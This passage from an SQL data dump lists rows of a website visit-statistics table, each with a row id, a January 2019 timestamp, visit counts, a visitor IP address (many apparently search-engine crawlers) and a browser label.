1.24','other'),(376820,1548338740,2,2,0,0,'91.214.211.66','chrome'),(376821,1548338757,1,1,0,0,'8.29.198.26','other'),(376822,1548338830,1,1,0,0,'54.36.149.5','other'),(376823,1548338865,1,1,0,0,'87.250.224.65','other'),(376824,1548339023,1,1,0,0,'178.93.103.41','chrome'),(376825,1548339029,1,1,0,0,'178.154.171.27','other'),(376826,1548339238,1,1,0,0,'157.55.39.130','other'),(376827,1548339252,1,1,0,0,'207.46.13.229','other'),(376828,1548339383,1,1,0,0,'213.180.203.40','other'),(376829,1548339424,1,1,0,0,'66.249.75.15','chrome'),(376830,1548339438,1,1,0,0,'66.249.75.20','chrome'),(376831,1548339544,1,1,0,0,'54.36.148.201','other'),(376832,1548339690,1,1,0,0,'54.36.148.38','other'),(376833,1548339794,1,1,0,0,'54.36.149.25','other'),(376834,1548339839,1,1,0,0,'216.244.66.241','other'),(376835,1548339892,1,1,0,0,'54.36.149.73','other'),(376836,1548340002,1,1,0,0,'46.133.235.166','chrome'),(376837,1548340019,1,1,0,0,'95.163.255.92','other'),(376838,1548340169,1,1,0,0,'54.36.148.227','other'),(376839,1548340205,1,1,0,0,'46.229.168.152','other'),(376840,1548340247,1,1,0,0,'178.93.103.41','chrome'),(376841,1548340427,1,1,0,0,'54.36.148.129','other'),(376842,1548340483,1,1,0,0,'5.45.207.19','other'),(376843,1548340566,1,1,0,0,'46.229.168.151','other'),(376844,1548340597,1,1,0,0,'54.36.149.81','other'),(376845,1548340608,1,1,0,0,'54.36.148.169','other'),(376846,1548340631,1,1,0,0,'8.29.198.27','other'),(376847,1548340649,2,2,0,0,'91.196.178.66','chrome'),(376848,1548340684,1,1,0,0,'54.36.148.219','other'),(376849,1548340877,1,1,0,0,'54.36.148.206','other'),(376850,1548340917,1,1,0,0,'54.36.148.127','other'),(376851,1548341033,1,1,0,0,'54.36.149.80','other'),(376852,1548341069,1,1,0,0,'54.36.148.172','other'),(376853,1548341374,14,14,0,0,'216.244.66.241','other'),(376854,1548341541,1,1,0,0,'54.36.148.76','other'),(376855,1548341602,1,1,0,0,'46.229.168.154','other'),(376856,1548341677,1,1,0,0,'54.36.149.51','other'),(376857,1548341768,1,1,0,0,'46.229.168.137','other'),(376858,1548342181,1,1,0,0,'54.36.149.33','other'),(376859,1548342237,1,1,0,0,'54.36.148.174','other'),(376860,1548342245,1,1,0,0,'54.36.148.53','other'),(376861,1548342302,2,2,0,0,'91.196.178.73','firefox'),(376862,1548342401,3,3,0,0,'216.244.66.241','other'),(376863,1548342649,1,1,0,0,'54.36.148.144','other'),(376864,1548342674,2,2,0,0,'37.53.137.1','chrome'),(376865,1548342821,1,1,0,0,'54.36.148.31','other'),(376866,1548342868,1,1,0,0,'54.36.149.76','other'),(376867,1548342968,1,1,0,0,'54.36.148.104','other'),(376868,1548342976,1,1,0,0,'54.36.148.215','other'),(376869,1548343099,1,1,0,0,'54.36.148.64','other'),(376870,1548343250,1,1,0,0,'207.46.13.113','other'),(376871,1548343273,1,1,0,0,'54.36.148.43','other'),(376872,1548343323,1,1,0,0,'54.36.148.129','other'),(376873,1548343465,1,1,0,0,'54.36.148.194','other'),(376874,1548343488,1,1,0,0,'13.66.139.0','other'),(376875,1548343742,1,1,0,0,'54.36.148.88','other'),(376876,1548343778,1,1,0,0,'173.252.127.22','other'),(376877,1548343779,1,1,0,0,'173.252.127.38','other'),(376878,1548344060,1,1,0,0,'54.36.149.47','other'),(376879,1548344163,10,10,0,0,'216.244.66.241','other'),(376880,1548344173,1,1,0,0,'54.36.148.123','other'),(376881,1548344412,1,1,0,0,'54.36.149.12','other'),(376882,1548344813,1,1,0,0,'207.46.13.229','other'),(376883,1548344827,1,1,0,0,'157.55.39.130','other'),(376884,1548344996,1,1,0,0,'54.36.148.52','other'),(376885,1548345113,3,3,0,0,'216.244.66.241','other'),(376886,1548345221,1,1,0,0,'46.229.168.129','other'),(376887,1548345285,1,1,0,0,'207.46.13.165','other'),(376888,1548345409,1,1,0,0,'51.255.65.46','other'),(376889,1548345623,1,1,0,0,'54.36.148.118','other'),(376890,1548345750,1,1,0,0,'46.229.168.148','other'),(376891,1548345803,1,1,0,0,'46.229.168.134','other'),(376892,1548345979,1,1,0,0,'54.36.149.4','other'),(376893,1548346010,1,1,0,0,'54.36.148.104','other'),(376894,1548346171,1,1,0,0,'66.249.75.22','chrome'),(376895,1548346188,1,1,0,0,'54.36.149.40','other'),(376896,1548346520,1,1,0,0,'54.36.148.210','other'),(376897,1548346665,1,1,0,0,'54.36.149.41','other'),(376898,1548346731,1,1,0,0,'207.46.13.229','other'),(376899,1548346755,1,1,0,0,'46.229.168.138','other'),(376900,1548346756,1,1,0,0,'46.229.168.140','other'),(376901,1548346858,1,1,0,0,'54.36.148.16','other'),(376902,1548346941,8,8,0,0,'216.244.66.241','other'),(376903,1548347367,180,180,0,0,'144.76.2.149','other'),(376904,1548347555,1,1,0,0,'54.36.149.42','other'),(376905,1548347879,6,6,0,0,'216.244.66.241','other'),(376906,1548347884,1,1,0,0,'46.229.168.129','other'),(376907,1548348079,1,1,0,0,'54.36.149.4','other'),(376908,1548348162,1,1,0,0,'46.229.168.130','other'),(376909,1548348164,1,1,0,0,'46.229.168.150','other'),(376910,1548348496,1,1,0,0,'54.36.148.172','other'),(376911,1548348580,1,1,0,0,'54.36.149.42','other'),(376912,1548348605,1,1,0,0,'5.45.207.79','other'),(376913,1548348714,1,1,0,0,'46.229.168.154','other'),(376914,1548348811,1,1,0,0,'54.36.148.20','other'),(376915,1548349170,2,2,0,0,'178.154.244.11','other'),(376916,1548349247,1,1,0,0,'54.36.148.135','other'),(376917,1548349452,1,1,0,0,'54.36.148.243','other'),(376918,1548349585,1,1,0,0,'8.29.198.26','other'),(376919,1548349672,1,1,0,0,'46.229.168.129','other'),(376920,1548349696,29,29,0,0,'144.76.119.201','other'),(376921,1548349720,2,2,0,0,'54.36.149.8','other'),(376922,1548349730,4,4,0,0,'216.244.66.241','other'),(376923,1548349760,1,1,0,0,'40.77.167.171','other'),(376924,1548349844,1,1,0,0,'207.46.13.229','other'),(376925,1548349957,1,1,0,0,'54.36.148.98','other'),(376926,1548350199,1,1,0,0,'54.36.148.173','other'),(376927,1548350239,1,1,0,0,'54.36.148.52','other'),(376928,1548350247,1,1,0,0,'54.36.148.25','other'),(376929,1548350260,1,1,0,0,'46.229.168.144','other'),(376930,1548350295,1,1,0,0,'92.113.127.219','chrome'),(376931,1548350319,1,1,0,0,'54.36.148.99','other'),(376932,1548350694,3,3,0,0,'216.244.66.241','other'),(376933,1548350744,1,1,0,0,'54.36.149.105','other'),(376934,1548350834,1,1,0,0,'54.36.149.50','other'),(376935,1548350904,1,1,0,0,'54.36.148.111','other'),(376936,1548350996,1,1,0,0,'66.249.75.15','chrome'),(376937,1548351258,1,1,0,0,'40.77.167.30','other'),(376938,1548351468,1,1,0,0,'8.29.198.25','other'),(376939,1548351533,1,1,0,0,'54.36.148.80','other'),(376940,1548351669,1,1,0,0,'54.36.148.222','other'),(376941,1548351774,1,1,0,0,'54.36.148.72','other'),(376942,1548351806,5,5,0,0,'216.244.66.241','other'),(376943,1548351836,1,1,0,0,'92.113.189.249','chrome'),(376944,1548351894,1,1,0,0,'66.249.75.142','chrome'),(376945,1548351903,1,1,0,0,'91.196.178.76','chrome'),(376946,1548351982,1,1,0,0,'178.154.244.11','other'),(376947,1548352240,1,1,0,0,'54.36.149.63','other'),(376948,1548352625,1,1,0,0,'54.36.148.56','other'),(376949,1548352631,1,1,0,0,'46.229.168.143','other'),(376950,1548352666,1,1,0,0,'46.229.168.141','other'),(376951,1548352679,1,1,0,0,'207.46.13.113','other'),(376952,1548352724,7,7,0,0,'216.244.66.241','other'),(376953,1548352791,1,1,0,0,'54.36.148.172','other'),(376954,1548352917,1,1,0,0,'66.249.75.144','chrome'),(376955,1548352918,1,1,0,0,'54.36.148.106','other'),(376956,1548352941,1,1,0,0,'45.55.58.166','other'),(376957,1548353209,1,1,0,0,'54.36.149.28','other'),(376958,1548353436,1,1,0,0,'207.46.13.171','other'),(376959,1548353614,1,1,0,0,'207.46.13.229','other'),(376960,1548353676,1,1,0,0,'216.244.66.241','other'),(376961,1548353679,1,1,0,0,'46.229.168.142','other'),(376962,1548353680,1,1,0,0,'207.46.13.113','other'),(376963,1548353787,1,1,0,0,'54.36.148.231','other'),(376964,1548353862,1,1,0,0,'54.36.149.71','other'),(376965,1548353934,1,1,0,0,'54.36.148.97','other'),(376966,1548354142,3,3,0,0,'91.196.178.129','chrome'),(376967,1548354253,1,1,0,0,'54.36.148.111','other'),(376968,1548354263,2,2,0,0,'91.196.178.129','firefox'),(376969,1548354429,1,1,0,0,'207.46.13.171','other'),(376970,1548354666,1,1,0,0,'54.36.149.36','other'),(376971,1548354845,1,1,0,0,'54.36.149.73','other'),(376972,1548355262,10,10,0,0,'216.244.66.241','other'),(376973,1548355432,1,1,0,0,'54.36.149.18','other'),(376974,1548355459,1,1,0,0,'54.36.148.17','other'),(376975,1548355501,2,2,0,0,'207.46.13.229','other'),(376976,1548355535,1,1,0,0,'54.36.148.136','other'),(376977,1548355560,2,2,0,0,'46.133.230.139','chrome'),(376978,1548355777,1,1,0,0,'66.249.75.140','chrome'),(376979,1548355845,1,1,0,0,'40.77.167.30','other'),(376980,1548355904,1,1,0,0,'54.36.148.165','other'),(376981,1548355934,1,1,0,0,'54.36.149.50','other'),(376982,1548355986,1,1,0,0,'46.229.168.136','other'),(376983,1548356371,10,10,0,0,'216.244.66.241','other'),(376984,1548356424,1,1,0,0,'54.36.148.82','other'),(376985,1548356448,1,1,0,0,'54.36.149.5','other'),(376986,1548356497,1,1,0,0,'54.36.148.250','other'),(376987,1548356613,1,1,0,0,'54.36.148.72','other'),(376988,1548356641,1,1,0,0,'54.36.148.220','other'),(376989,1548356707,1,1,0,0,'66.249.75.144','chrome'),(376990,1548356838,1,1,0,0,'66.249.75.142','chrome'),(376991,1548356982,1,1,0,0,'54.36.148.189','other'),(376992,1548357059,1,1,0,0,'95.163.255.97','other'),(376993,1548357061,1,1,0,0,'95.163.255.93','other'),(376994,1548357247,1,1,0,0,'54.36.148.12','other'),(376995,1548357394,1,1,0,0,'54.36.148.120','other'),(376996,1548357446,1,1,0,0,'54.36.148.105','other'),(376997,1548357450,1,1,0,0,'54.36.149.16','other'),(376998,1548357686,1,1,0,0,'54.36.148.81','other'),(376999,1548357721,1,1,0,0,'54.36.148.172','other'),(377000,1548357765,1,1,0,0,'54.36.148.173','other'),(377001,1548358023,2,2,0,0,'216.244.66.241','other'),(377002,1548358493,1,1,0,0,'54.36.148.201','other'),(377003,1548358529,1,1,0,0,'178.154.244.11','other'),(377004,1548358715,1,1,0,0,'87.250.224.65','other'),(377005,1548359014,10,10,0,0,'216.244.66.241','other'),(377006,1548359336,1,1,0,0,'66.249.75.140','chrome'),(377007,1548359420,1,1,0,0,'92.112.248.218','firefox'),(377008,1548359536,1,1,0,0,'54.36.149.1','other'),(377009,1548359553,1,1,0,0,'207.46.13.113','other'),(377010,1548359781,1,1,0,0,'46.229.168.146','other'),(377011,1548359963,2,2,0,0,'216.244.66.241','other'),(377012,1548360135,1,1,0,0,'54.36.148.214','other'),(377013,1548360155,1,1,0,0,'54.36.148.107','other'),(377014,1548360243,1,1,0,0,'54.36.148.56','other'),(377015,1548360412,1,1,0,0,'8.29.198.27','other'),(377016,1548360542,1,1,0,0,'54.36.148.255','other'),(377017,1548360800,1,1,0,0,'40.77.167.30','other'),(377018,1548360864,9,9,0,0,'216.244.66.241','other'),(377019,1548360915,1,1,0,0,'178.154.171.27','other'),(377020,1548360920,1,1,0,0,'5.45.207.79','other'),(377021,1548360965,1,1,0,0,'178.154.244.11','other'),(377022,1548361198,1,1,0,0,'40.77.167.220','other'),(377023,1548361389,3,3,0,0,'77.122.26.92','firefox'),(377024,1548361428,1,1,0,0,'54.36.148.95','other'),(377025,1548361455,1,1,0,0,'54.36.148.196','other'),(377026,1548361533,1,1,0,0,'46.229.168.146','other'),(377027,1548361754,1,1,0,0,'95.163.255.95','other'),(377028,1548361757,1,1,0,0,'95.163.255.92','other'),(377029,1548361781,1,1,0,0,'54.36.148.150','other'),(377030,1548361798,1,1,0,0,'46.229.168.147','other'),(377031,1548361931,4,4,0,0,'216.244.66.241','other'),(377032,1548361993,1,1,0,0,'54.36.148.56','other'),(377033,1548362043,1,1,0,0,'54.36.148.38','other'),(377034,1548362311,1,1,0,0,'8.29.198.25','other'),(377035,1548362766,1,1,0,0,'54.36.148.244','other'),(377036,1548362919,1,1,0,0,'54.36.149.48','other'),(377037,1548363088,1,1,0,0,'92.112.248.218','firefox'),(377038,1548363215,1,1,0,0,'54.36.148.117','other'),(377039,1548363512,1,1,0,0,'54.36.148.130','other'),(377040,1548363524,10,10,0,0,'216.244.66.241','other'),(377041,1548363565,1,1,0,0,'54.36.149.104','other'),(377042,1548363661,1,1,0,0,'54.36.148.161','other'),(377043,1548363743,1,1,0,0,'54.36.148.180','other'),(377044,1548363753,1,1,0,0,'54.36.148.160','other'),(377045,1548363773,1,1,0,0,'54.36.148.174','other'),(377046,1548363923,1,1,0,0,'54.36.148.119','other'),(377047,1548364189,1,1,0,0,'54.36.148.243','other'),(377048,1548364194,1,1,0,0,'46.229.168.152','other'),(377049,1548364230,1,1,0,0,'54.36.149.64','other'),(377050,1548364247,1,1,0,0,'66.249.75.16','chrome'),(377051,1548364262,1,1,0,0,'66.249.75.21','chrome'),(377052,1548364315,1,1,0,0,'207.46.13.171','other'),(377053,1548364566,1,1,0,0,'54.36.148.244','other'),(377054,1548364637,1,1,0,0,'54.36.148.175','other'),(377055,1548364686,2,2,0,0,'216.244.66.241','other'),(377056,1548364724,1,1,0,0,'54.36.148.57','other'),(377057,1548364836,1,1,0,0,'54.36.148.135','other'),(377058,1548364969,1,1,0,0,'54.36.149.103','other'),(377059,1548365055,1,1,0,0,'54.36.149.60','other'),(377060,1548365135,1,1,0,0,'54.36.149.38','other'),(377061,1548365294,1,1,0,0,'54.36.148.210','other'),(377062,1548365340,1,1,0,0,'91.196.178.99','chrome'),(377063,1548365482,1,1,0,0,'54.36.148.164','other'),(377064,1548365856,1,1,0,0,'54.36.148.196','other'),(377065,1548365914,1,1,0,0,'54.36.149.1','other'),(377066,1548366040,1,1,0,0,'54.36.148.28','other'),(377067,1548366280,12,12,0,0,'216.244.66.241','other'),(377068,1548366514,1,1,0,0,'54.36.148.33','other'),(377069,1548366826,1,1,0,0,'54.36.148.240','other'),(377070,1548366941,1,1,0,0,'54.36.148.215','other'),(377071,1548366995,1,1,0,0,'66.220.149.21','other'),(377072,1548367044,1,1,0,0,'54.36.148.227','other'),(377073,1548367433,1,1,0,0,'54.36.149.58','other'),(377074,1548367478,1,1,0,0,'54.36.149.76','other'),(377075,1548367479,1,1,0,0,'54.36.148.121','other'),(377076,1548367547,1,1,0,0,'54.36.148.43','other'),(377077,1548367573,1,1,0,0,'54.36.148.58','other'),(377078,1548367781,1,1,0,0,'54.36.149.30','other'),(377079,1548367806,2,2,0,0,'216.244.66.241','other'),(377080,1548368646,2,2,0,0,'54.36.148.186','other'),(377081,1548368723,1,1,0,0,'66.249.75.155','chrome'),(377083,1548368936,1,1,0,0,'54.36.148.69','other'),(377084,1548369045,14,14,0,0,'216.244.66.241','other'),(377085,1548369246,1,1,0,0,'40.77.167.30','other'),(377086,1548369287,1,1,0,0,'54.36.149.20','other'),(377087,1548369368,1,1,0,0,'54.36.148.227','other'),(377088,1548369428,1,1,0,0,'54.36.148.180','other'),(377089,1548369691,1,1,0,0,'46.229.168.134','other'),(377090,1548369693,1,1,0,0,'46.229.168.153','other'),(377091,1548369772,1,1,0,0,'54.36.148.66','other'),(377092,1548370261,1,1,0,0,'54.36.148.18','other'),(377093,1548370348,4,4,0,0,'216.244.66.241','other'),(377094,1548370404,1,1,0,0,'54.36.149.52','other'),(377095,1548370624,1,1,0,0,'54.36.149.51','other'),(377096,1548370726,1,1,0,0,'207.46.13.229','other'),(377097,1548370875,1,1,0,0,'54.36.148.30','other'),(377098,1548370970,1,1,0,0,'54.36.148.179','other'),(377099,1548371008,1,1,0,0,'54.36.148.129','other'),(377100,1548371019,1,1,0,0,'5.188.210.53','chrome'),(377101,1548371162,1,1,0,0,'46.229.168.143','other'),(377102,1548371244,1,1,0,0,'8.29.198.27','other'),(377103,1548371577,1,1,0,0,'54.36.148.168','other'),(377104,1548371671,1,1,0,0,'54.36.149.58','other'),(377105,1548371758,1,1,0,0,'46.229.168.148','other'),(377106,1548371959,1,1,0,0,'46.229.168.153','other'),(377107,1548371983,10,10,0,0,'216.244.66.241','other'),(377108,1548372073,1,1,0,0,'54.36.149.77','other'),(377109,1548372314,1,1,0,0,'66.249.69.148','chrome'),(377110,1548372316,1,1,0,0,'46.229.168.134','other'),(377111,1548372318,1,1,0,0,'46.229.168.147','other'),(377112,1548372515,1,1,0,0,'54.36.148.115','other'),(377113,1548372871,1,1,0,0,'54.36.148.113','other'),(377114,1548373074,1,1,0,0,'54.36.149.4','other'),(377115,1548373148,1,1,0,0,'8.29.198.27','other'),(377116,1548373221,1,1,0,0,'66.249.75.140','chrome'),(377117,1548373267,1,1,0,0,'54.36.148.74','other'),(377118,1548373459,1,1,0,0,'54.36.148.121','other'),(377119,1548373462,1,1,0,0,'54.36.149.15','other'),(377120,1548373471,2,2,0,0,'216.244.66.241','other'),(377121,1548373565,1,1,0,0,'54.36.149.87','other'),(377122,1548373747,1,1,0,0,'178.154.171.27','other'),(377123,1548373763,1,1,0,0,'54.36.149.52','other'),(377124,1548373792,1,1,0,0,'5.45.207.8','other'),(377125,1548373819,1,1,0,0,'54.36.149.3','other'),(377126,1548373860,1,1,0,0,'178.154.171.24','other'),(377127,1548373868,1,1,0,0,'216.108.231.130','other'),(377128,1548373874,1,1,0,0,'87.250.224.65','other'),(377129,1548374008,1,1,0,0,'54.36.148.114','other'),(377130,1548374350,1,1,0,0,'54.36.149.96','other'),(377131,1548374356,1,1,0,0,'178.154.244.65','other'),(377132,1548374476,1,1,0,0,'213.180.203.40','other'),(377133,1548374562,6,6,0,0,'216.244.66.241','other'),(377134,1548374702,1,1,0,0,'95.108.213.4','other'),(377135,1548374888,1,1,0,0,'46.229.168.141','other'),(377136,1548374982,1,1,0,0,'141.8.132.16','other'),(377137,1548375096,1,1,0,0,'54.36.149.70','other'),(377138,1548375163,1,1,0,0,'54.36.149.101','other'),(377139,1548375289,1,1,0,0,'180.76.15.151','other'),(377140,1548375447,1,1,0,0,'54.36.148.27','other'),(377141,1548375483,1,1,0,0,'54.36.148.79','other'),(377142,1548375578,8,8,0,0,'216.244.66.241','other'),(377143,1548375720,1,1,0,0,'54.36.148.221','other'),(377144,1548375794,1,1,0,0,'54.36.149.25','other'),(377145,1548375795,1,1,0,0,'46.229.168.137','other'),(377146,1548375873,2,2,0,0,'207.46.13.229','other'),(377147,1548375975,1,1,0,0,'54.36.148.18','other'),(377148,1548375988,1,1,0,0,'54.36.149.33','other'),(377149,1548376190,1,1,0,0,'207.46.13.113','other'),(377150,1548376245,1,1,0,0,'54.36.148.197','other'),(377151,1548376311,1,1,0,0,'54.36.148.122','other'),(377152,1548376709,1,1,0,0,'5.255.253.25','other'),(377153,1548376921,1,1,0,0,'54.36.148.49','other'),(377154,1548377003,1,1,0,0,'207.46.13.229','other'),(377155,1548377114,1,1,0,0,'54.36.148.39','other'),(377156,1548377266,1,1,0,0,'46.229.168.133','other'),(377157,1548377351,12,12,0,0,'216.244.66.241','other'),(377158,1548377471,1,1,0,0,'54.36.148.97','other'),(377159,1548377518,1,1,0,0,'54.36.148.233','other'),(377160,1548377710,1,1,0,0,'91.219.236.171','other'),(377161,1548377712,1,1,0,0,'54.37.234.66','other'),(377162,1548377719,1,1,0,0,'54.36.148.101','other'),(377163,1548377972,1,1,0,0,'54.36.149.9','other'),(377164,1548378199,1,1,0,0,'54.36.148.243','other'),(377165,1548378483,1,1,0,0,'54.36.149.3','other'),(377166,1548378516,1,1,0,0,'54.36.149.37','other'),(377167,1548378657,1,1,0,0,'54.36.148.146','other'),(377168,1548378779,1,1,0,0,'54.36.148.109','other'),(377169,1548378869,1,1,0,0,'54.36.148.14','other'),(377170,1548378902,2,2,0,0,'216.244.66.241','other'),(377171,1548378913,1,1,0,0,'54.36.148.197','other'),(377172,1548379038,1,1,0,0,'66.249.75.17','chrome'),(377173,1548379040,1,1,0,0,'66.249.75.20','chrome'),(377174,1548379084,1,1,0,0,'40.77.167.216','other'),(377175,1548379133,2,2,0,0,'207.46.13.113','other'),(377176,1548379140,1,1,0,0,'54.36.148.195','other'),(377177,1548379167,1,1,0,0,'54.36.149.79','other'),(377178,1548379188,1,1,0,0,'54.36.148.125','other'),(377179,1548379439,1,1,0,0,'54.36.149.92','other'),(377180,1548379533,1,1,0,0,'54.36.149.94','other'),(377181,1548379650,1,1,0,0,'54.36.148.181','other'),(377182,1548379699,1,1,0,0,'66.249.75.22','chrome'),(377183,1548379755,1,1,0,0,'54.36.149.61','other'),(377184,1548380052,10,10,0,0,'216.244.66.241','other'),(377185,1548380201,1,1,0,0,'54.36.148.203','other'),(377186,1548380304,1,1,0,0,'54.36.148.105','other'),(377187,1548380335,1,1,0,0,'54.36.149.9','other'),(377188,1548380387,1,1,0,0,'66.249.69.148','chrome'),(377189,1548380453,1,1,0,0,'207.46.13.229','other'),(377190,1548380528,1,1,0,0,'54.36.148.197','other'),(377191,1548380650,1,1,0,0,'40.77.167.216','other'),(377192,1548380762,1,1,0,0,'66.249.75.16','chrome'),(377194,1548380767,2,2,0,0,'66.249.75.20','chrome'),(377195,1548380890,1,1,0,0,'54.36.148.141','other'),(377196,1548381164,1,1,0,0,'46.229.168.137','other'),(377197,1548381336,1,1,0,0,'54.36.149.93','other'),(377198,1548381350,1,1,0,0,'66.249.75.17','chrome'),(377199,1548381351,4,4,0,0,'66.249.75.22','chrome'),(377200,1548381397,1,1,0,0,'66.249.75.21','chrome'),(377201,1548381399,1,1,0,0,'54.36.149.107','other'),(377202,1548381653,1,1,0,0,'54.36.148.79','other'),(377203,1548381680,1,1,0,0,'54.36.148.148','other'),(377204,1548381882,1,1,0,0,'207.46.13.113','other'),(377205,1548382068,1,1,0,0,'8.29.198.26','other'),(377206,1548382306,1,1,0,0,'54.36.148.113','other'),(377207,1548382461,1,1,0,0,'66.249.69.149','chrome'),(377208,1548382641,1,1,0,0,'46.229.168.141','other'),(377209,1548382643,1,1,0,0,'46.229.168.145','other'),(377210,1548382816,13,13,0,0,'216.244.66.241','other'),(377211,1548383032,1,1,0,0,'66.249.75.153','chrome'),(377212,1548383033,1,1,0,0,'66.249.75.140','chrome'),(377213,1548383055,1,1,0,0,'54.36.148.200','other'),(377214,1548383168,3,3,0,0,'66.249.75.20','chrome'),(377215,1548383173,1,1,0,0,'66.249.75.21','chrome'),(377216,1548383280,1,1,0,0,'40.77.167.216','other'),(377217,1548383368,1,1,0,0,'54.36.148.222','other'),(377218,1548383405,1,1,0,0,'46.229.168.137','other'),(377219,1548383737,1,1,0,0,'54.36.148.156','other'),(377220,1548383839,1,1,0,0,'54.36.148.177','other'),(377221,1548383875,2,2,0,0,'66.249.75.22','chrome'),(377222,1548384006,1,1,0,0,'8.29.198.26','other'),(377223,1548384109,1,1,0,0,'54.36.148.15','other'),(377224,1548384304,1,1,0,0,'54.36.149.76','other'),(377225,1548384344,1,1,0,0,'54.36.149.87','other'),(377226,1548384424,1,1,0,0,'54.36.148.220','other'),(377227,1548384457,1,1,0,0,'54.36.148.109','other'),(377228,1548384533,2,2,0,0,'66.249.69.149','chrome'),(377229,1548384540,2,2,0,0,'54.36.148.139','other'),(377230,1548384646,1,1,0,0,'207.46.13.229','other'),(377231,1548384729,1,1,0,0,'54.36.149.24','other'),(377232,1548384737,4,4,0,0,'216.244.66.241','other'),(377233,1548384773,1,1,0,0,'66.249.75.157','chrome'),(377234,1548384774,1,1,0,0,'66.249.75.140','chrome'),(377235,1548385037,1,1,0,0,'54.36.148.231','other'),(377236,1548385096,2,2,0,0,'66.249.75.20','chrome'),(377237,1548385101,1,1,0,0,'46.229.168.137','other'),(377238,1548385103,2,2,0,0,'66.249.69.148','chrome'),(377239,1548385692,2,2,0,0,'66.249.75.21','chrome'),(377240,1548385695,1,1,0,0,'54.36.148.136','other'),(377241,1548385782,10,10,0,0,'216.244.66.241','other'),(377242,1548386086,1,1,0,0,'207.46.13.128','other'),(377243,1548386179,1,1,0,0,'54.36.149.71','other'),(377244,1548386374,1,1,0,0,'141.8.142.103','other'),(377245,1548386431,1,1,0,0,'54.36.148.180','other'),(377246,1548386557,1,1,0,0,'54.36.148.203','other'),(377247,1548386594,4,4,0,0,'5.45.207.19','other'),(377248,1548386666,1,1,0,0,'54.36.149.75','other'),(377249,1548386727,1,1,0,0,'54.36.148.196','other'),(377250,1548386932,1,1,0,0,'54.36.148.80','other'),(377251,1548386937,1,1,0,0,'54.36.148.177','other'),(377252,1548386942,1,1,0,0,'54.36.149.54','other'),(377253,1548386964,1,1,0,0,'46.229.168.152','other'),(377254,1548386966,1,1,0,0,'46.229.168.150','other'),(377255,1548387200,1,1,0,0,'54.36.148.101','other'),(377256,1548387288,1,1,0,0,'87.250.224.47','other'),(377257,1548387333,1,1,0,0,'54.36.148.36','other'),(377258,1548387424,1,1,0,0,'66.249.75.144','chrome'),(377259,1548387730,1,1,0,0,'54.36.148.155','other'),(377260,1548387763,1,1,0,0,'87.250.224.65','other'),(377261,1548387853,1,1,0,0,'54.36.148.135','other'),(377262,1548387956,1,1,0,0,'54.36.148.112','other'),(377263,1548388095,1,1,0,0,'54.36.148.192','other'),(377264,1548388192,2,2,0,0,'52.12.224.151','chrome'),(377265,1548388307,1,1,0,0,'54.36.149.15','other'),(377266,1548388315,7,7,0,0,'216.244.66.241','other'),(377267,1548388380,1,1,0,0,'54.36.149.102','other'),(377268,1548388419,1,1,0,0,'54.36.148.160','other'),(377269,1548388529,1,1,0,0,'54.36.149.31','other'),(377270,1548388959,1,1,0,0,'178.154.244.11','other'),(377271,1548389219,1,1,0,0,'54.36.149.16','other'),(377272,1548389351,1,1,0,0,'216.244.66.241','other'),(377273,1548389542,1,1,0,0,'54.36.148.163','other'),(377274,1548389633,1,1,0,0,'54.36.149.103','other'),(377275,1548389797,1,1,0,0,'54.36.148.92','other'),(377276,1548389838,1,1,0,0,'54.36.148.196','other'),(377277,1548389848,1,1,0,0,'46.229.168.135','other'),(377278,1548390282,1,1,0,0,'54.36.148.162','other'),(377279,1548390462,1,1,0,0,'54.36.148.225','other'),(377280,1548390496,1,1,0,0,'54.36.149.33','other'),(377281,1548390686,1,1,0,0,'46.229.168.154','other'),(377282,1548391112,8,8,0,0,'216.244.66.241','other'),(377283,1548391363,1,1,0,0,'66.249.75.20','chrome'),(377284,1548391417,1,1,0,0,'66.249.75.17','chrome'),(377285,1548391563,1,1,0,0,'66.249.75.140','chrome'),(377286,1548391570,2,2,0,0,'157.55.39.75','other'),(377287,1548391660,1,1,0,0,'54.36.148.129','other'),(377288,1548391993,1,1,0,0,'54.36.149.67','other'),(377289,1548392181,3,3,0,0,'216.244.66.241','other'),(377290,1548392559,1,1,0,0,'54.36.148.132','other'),(377291,1548392580,1,1,0,0,'180.76.15.143','other'),(377292,1548392581,1,1,0,0,'180.76.15.151','other'),(377293,1548392674,1,1,0,0,'54.36.148.233','other'),(377294,1548392709,1,1,0,0,'54.36.148.167','other'),(377295,1548392807,1,1,0,0,'54.36.148.88','other'),(377296,1548392841,1,1,0,0,'66.249.75.140','chrome'),(377297,1548392889,1,1,0,0,'8.29.198.25','other'),(377298,1548392914,1,1,0,0,'54.36.148.228','other'),(377299,1548393046,2,2,0,0,'66.249.75.20','chrome'),(377300,1548393286,2,2,0,0,'207.46.13.229','other'),(377301,1548393332,1,1,0,0,'54.36.148.184','other'),(377302,1548393426,1,1,0,0,'54.36.148.134','other'),(377303,1548393541,1,1,0,0,'54.36.148.249','other'),(377304,1548393877,14,14,0,0,'216.244.66.241','other'),(377305,1548393891,1,1,0,0,'54.36.148.143','other'),(377306,1548394123,1,1,0,0,'54.36.148.204','other'),(377307,1548394220,1,1,0,0,'178.154.244.11','other'),(377308,1548394386,1,1,0,0,'66.249.75.21','chrome'),(377309,1548394510,1,1,0,0,'54.36.148.192','other'),(377310,1548394512,1,1,0,0,'54.36.148.74','other'),(377311,1548394560,1,1,0,0,'46.229.168.144','other'),(377312,1548394801,1,1,0,0,'54.36.148.118','other'),(377313,1548394811,4,4,0,0,'216.244.66.241','other'),(377314,1548394845,1,1,0,0,'8.29.198.26','other'),(377315,1548395175,1,1,0,0,'54.36.149.21','other'),(377316,1548395338,1,1,0,0,'54.36.149.101','other'),(377317,1548395383,1,1,0,0,'54.36.148.112','other'),(377318,1548395583,1,1,0,0,'54.36.148.206','other'),(377319,1548396165,1,1,0,0,'46.229.168.142','other'),(377320,1548396294,1,1,0,0,'54.36.148.222','other'),(377321,1548396314,1,1,0,0,'54.36.148.99','other'),(377322,1548396491,1,1,0,0,'54.36.148.250','other'),(377323,1548396514,1,1,0,0,'54.36.148.54','other'),(377324,1548396525,1,1,0,0,'54.36.148.173','other'),(377325,1548396641,1,1,0,0,'54.36.148.140','other'),(377326,1548396685,6,6,0,0,'216.244.66.241','other'),(377327,1548396812,1,1,0,0,'54.36.148.203','other'),(377328,1548396849,2,2,0,0,'37.54.62.81','chrome'),(377329,1548396921,1,1,0,0,'54.36.148.251','other'),(377330,1548397003,2,2,0,0,'51.77.177.194','other'),(377331,1548397005,1,1,0,0,'37.146.242.212','chrome'),(377332,1548397007,1,1,0,0,'178.140.229.253','chrome'),(377333,1548397395,1,1,0,0,'54.36.149.47','other'),(377334,1548397430,1,1,0,